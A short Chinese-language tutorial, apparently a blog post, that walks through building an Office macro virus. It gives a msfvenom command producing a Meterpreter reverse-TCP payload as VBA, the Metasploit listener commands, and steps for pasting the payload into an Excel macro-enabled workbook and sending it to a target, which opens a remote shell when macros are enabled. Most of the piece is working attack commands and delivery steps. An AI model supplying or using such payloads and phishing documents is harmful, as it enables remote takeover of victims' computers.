宏病毒复现

宏病毒复现

1、简单讲讲宏病毒

百度：宏病毒是一种寄存在文档或模板的宏中的计算机病毒。一旦打开这样的文档，其中的宏就会被执行，于是宏病毒就会被激活，转移到计算机上，并驻留在Normal模板上。从此以后，所有自动保存的文档都会“感染”上这种宏病毒，而且如果其他用户打开了感染病毒的文档，宏病毒又会转移到他的计算机上。

运行成功能够直接getshell

2、msf生成宏病毒

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.1(当前主机的ip) lport=6666（当前主机端口） -f vba -o /var/www/html/six.vba（文件生成位置，名字）

3、设置监听

进入msf设置监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost xxxxxx	 //设置本地监听ip
set lport xxxx		//设置本地监听端口
exploit

4、部署宏病毒

1、访问我的服务器，点开刚生成的宏病毒，拷贝至office宏里。

2、这里使用Excel作为演示，点开视图——宏——查看宏

谁便输个名字，创建

然后全选，替换为我们生成的宏。


ctrl+s保存为启用宏的工作薄，保存好后，你就可以发给你的目标机。

双击打开，点击启用宏

哎。这里msf这边就监听到了，并且取得了权限

复现成功

5、总结

这里演示的代码是没有加密，没有免杀的，更加全面的宏病毒生成方式请参考学长的文章：

• Office宏病毒几种简单生成方式：Office宏病毒几种简单生成方式
  https://bbs.ichunqiu.com/thread-54430-1-1.html

谈谈遇到的坑：

• 之前用的目标机是系统语言英文的32为windows，然后就一直报错，监听不了，换了个虚拟机，中文系统，就执行正常了。在这里卡了很久。